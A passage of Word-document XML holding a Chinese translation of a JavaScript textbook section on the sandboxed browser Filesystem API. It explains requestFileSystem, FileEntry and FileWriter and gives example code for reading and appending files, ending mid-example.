    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>这里</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>是一个错误对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(e);//</w:t>
      </w:r>
      <w:r>
        <w:t>或者以其他方式处理它</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不论是同步版本的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>还是异步版本的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，都可以指定文件系统的有效期和大小。一个永久的（</w:t>
      </w:r>
      <w:r>
        <w:t>PERSISTENT</w:t>
      </w:r>
      <w:r>
        <w:t>）的文件系统适用于想要永久存储用户数据的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用。除非用户显式要求删除这些数据，否则浏览器永远都不会删除这些数据。一</w:t>
      </w:r>
      <w:r>
        <w:t>个临时的（</w:t>
      </w:r>
      <w:r>
        <w:t>TEMPORARY</w:t>
      </w:r>
      <w:r>
        <w:t>）文件系统适用于想要缓存数据，在浏览器删除该文件系统任然可以操作这些数据的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用。文件系统的大小是以字节为单位指定的，并且其大小应该是一个保证足够存储所需数据的合理上限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>。浏览器可能会强制限额。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用这些方法获取的文件系统依赖于包含它的文档源。所有同源（主机、端口和协议）的文档或者</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用共享一个文件系统。两个非同源的文档或者</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用拥有完全独立的文件系统。同时，文件系统和用户硬盘上其他的文件也是相互隔离的：</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用是无法拥有整个硬盘的</w:t>
      </w:r>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t>权限的，或者说无法访问</w:t>
      </w:r>
      <w:r>
        <w:t>任意的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是，这些函数名字中都有</w:t>
      </w:r>
      <w:r>
        <w:t>"request"</w:t>
      </w:r>
      <w:r>
        <w:t>。第一次调用的时候，浏览器在创建一个文件系统并授权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>前，可能会询问用户是否允许。一旦用户允许了，接下来调用这些函数的时候，就只会返回一个表示已有本地文件系统的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过上述方法获取到的文件系统对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t>属性，该属性指向文件系统的根目录。这是一个</w:t>
      </w:r>
      <w:r>
        <w:t>DirectoryEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并且它可能还有嵌套的目录，这些嵌套的目录也用</w:t>
      </w:r>
      <w:r>
        <w:t>DirectoryEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示。文件系统的每个目录中包含的文件都用</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示。</w:t>
      </w:r>
      <w:r>
        <w:t>Directo</w:t>
      </w:r>
      <w:r>
        <w:t>ryEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义一些通过路径名（</w:t>
      </w:r>
      <w:r>
        <w:t>pathname</w:t>
      </w:r>
      <w:r>
        <w:t>）（如果指定的名字不存在，它们会根据指定的情况来创建新的目录或者文件）获取</w:t>
      </w:r>
      <w:r>
        <w:t>DirectoryEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>DirectoryEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>createReader()</w:t>
      </w:r>
      <w:r>
        <w:t>工厂方法，用于返回一个列出目录内容列表的</w:t>
      </w:r>
      <w:r>
        <w:t>DirectoryReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>类定义一个获取表示文件内容的</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象（一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>）的方法。然后，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象（</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍过）读取该文件。除此之外，</w:t>
      </w:r>
      <w:r>
        <w:t>Fi</w:t>
      </w:r>
      <w:r>
        <w:t>leEntry</w:t>
      </w:r>
      <w:r>
        <w:t>还定义一个方法，该方法返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>FileWriter</w:t>
      </w:r>
      <w:r>
        <w:t>对象，用该对象可以将内容写入到文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>读取或者写入文件分为如下几步：首先要获得文件系统对象。然后通过该对象的根目录来查找（也可以创建）需要的文件的</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象。然后使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象获取</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>FileWriter</w:t>
      </w:r>
      <w:r>
        <w:t>对象来进行读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写操作。如果在使用异步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的情况下，这几步过程会更加复杂：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>读取文本文件</w:t>
      </w:r>
      <w:r>
        <w:t>"hello.txt"</w:t>
      </w:r>
      <w:r>
        <w:t>，并将其内容以日志的形式输出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>由于使用了异步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，因此出现了</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>层函数嵌套</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此例子不包括任何错误回调处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>requestFileSystem(PERSISTENT,10*1024*1024,function(fs){//</w:t>
      </w:r>
      <w:r>
        <w:t>获取文件系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>fs.root.getFile("hello.txt",{},function(entry){//</w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>entry.file(function(file){//</w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var reader=new FileReader();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.readAsText(file);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.onload=functio</w:t>
      </w:r>
      <w:r>
        <w:t>n(){//</w:t>
      </w:r>
      <w:r>
        <w:t>获取文件内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(reader.result);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例</w:t>
      </w:r>
      <w:r>
        <w:t>22-13</w:t>
      </w:r>
      <w:r>
        <w:t>是一个更加完整的例子，涵盖了很多内容。它展示了如何使用异步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>读文件、写文件、删除文件、创建目录以及列出目录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-13</w:t>
      </w:r>
      <w:r>
        <w:t>：使用异步文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这些函数在</w:t>
      </w:r>
      <w:r>
        <w:t>Google Chrome10.0</w:t>
      </w:r>
      <w:r>
        <w:t>开发版中都测试过了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>的时候需要开启这些选项：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*--unlimited-quota-for-files:</w:t>
      </w:r>
      <w:r>
        <w:t>启用文件系统访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*--allow-file-access-from-files:</w:t>
      </w:r>
      <w:r>
        <w:t>允许通过</w:t>
      </w:r>
      <w:r>
        <w:t>file://URL</w:t>
      </w:r>
      <w:r>
        <w:t>进行测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里使用的大部分异步函数都接受一个可选的错误回调参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里的回调函数只是简单地将错误输出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function logerr(e){console.log(e);}//requestFileSystem()</w:t>
      </w:r>
      <w:r>
        <w:t>方法创建了一个在沙箱环境中的本地文件系统，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并且只有同源的应用才可以访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>可以在该文件系统中进行文件读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写，但是只能限定在该沙箱中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>不能访问其他的文件系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>filesystem;//</w:t>
      </w:r>
      <w:r>
        <w:t>假设在调用下面的函数之前，已经初始化完毕</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>requestFileSystem(PERSISTENT,//</w:t>
      </w:r>
      <w:r>
        <w:t>或者采用用于缓存文件的临时（</w:t>
      </w:r>
      <w:r>
        <w:t>TEMPORARY</w:t>
      </w:r>
      <w:r>
        <w:t>）文件系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>10*1024*1024,//10MB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(fs){//</w:t>
      </w:r>
      <w:r>
        <w:t>完成后，调用此方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>filesystem=fs;//</w:t>
      </w:r>
      <w:r>
        <w:t>将文件系统保存到一个全局变量中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>logerr);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果发生错误则调用此方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以文本形式读取指定文件的内容，并将它们传递给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function readTextFile(path,cal</w:t>
      </w:r>
      <w:r>
        <w:t>lback){//</w:t>
      </w:r>
      <w:r>
        <w:t>根据指定的文件名，调用</w:t>
      </w:r>
      <w:r>
        <w:t>getFile()</w:t>
      </w:r>
      <w:r>
        <w:t>获取相应的</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>filesystem.root.getFile(path,{},function(entry){//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>调用此方法来获得文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在调用</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry.file()</w:t>
      </w:r>
      <w:r>
        <w:t>方法获取</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>entry.file(function(file){//file</w:t>
      </w:r>
      <w:r>
        <w:t>就表示</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var reader=new FileReader();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.readAsTex</w:t>
      </w:r>
      <w:r>
        <w:t>t(file);//</w:t>
      </w:r>
      <w:r>
        <w:t>读取文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>reader.onload=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>当读取成功时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(reader.result);//</w:t>
      </w:r>
      <w:r>
        <w:t>将其内容传递给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.onerror=logerr;//</w:t>
      </w:r>
      <w:r>
        <w:t>记录调用</w:t>
      </w:r>
      <w:r>
        <w:t>readAsText()</w:t>
      </w:r>
      <w:r>
        <w:t>时发生的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},logerr);//</w:t>
      </w:r>
      <w:r>
        <w:t>记录调用</w:t>
      </w:r>
      <w:r>
        <w:t>file()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时发生的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>logerr);//</w:t>
      </w:r>
      <w:r>
        <w:t>记录调用</w:t>
      </w:r>
      <w:r>
        <w:t>getFile()</w:t>
      </w:r>
      <w:r>
        <w:t>时发生的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将指定的内容添加到指定路径的文件中，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果指定路径的文件不存在，则使用该文件名创建一个新的文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>完成之后，调用回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function appendToFile(path,contents,callback){//filesystem.root</w:t>
      </w:r>
      <w:r>
        <w:t>指根目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>filesystem.root.getFile(//</w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>path,//</w:t>
      </w:r>
      <w:r>
        <w:t>想要获取的文件的名字和路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{create:true},//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不存在则创建一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(entry){//</w:t>
      </w:r>
      <w:r>
        <w:t>完成之后调用此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>entry.createWriter(//</w:t>
      </w:r>
      <w:r>
        <w:t>为该文件创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>FileWriter</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(writer){//</w:t>
      </w:r>
      <w:r>
        <w:t>创建完成之后调用此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>默认情况下，从文件最开始开始写入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里指定从文件最后开始写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>writer.seek(writer.length);//</w:t>
      </w:r>
      <w:r>
        <w:t>移动到文件最后</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将文件内容转换成</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//contents</w:t>
      </w:r>
      <w:r>
        <w:t>参数可以是字符串、</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bb=new BlobBuilder()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bb.append(contents);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var blob=bb.getBlob();//</w:t>
      </w:r>
      <w:r>
        <w:t>现在将该</w:t>
      </w:r>
      <w:r>
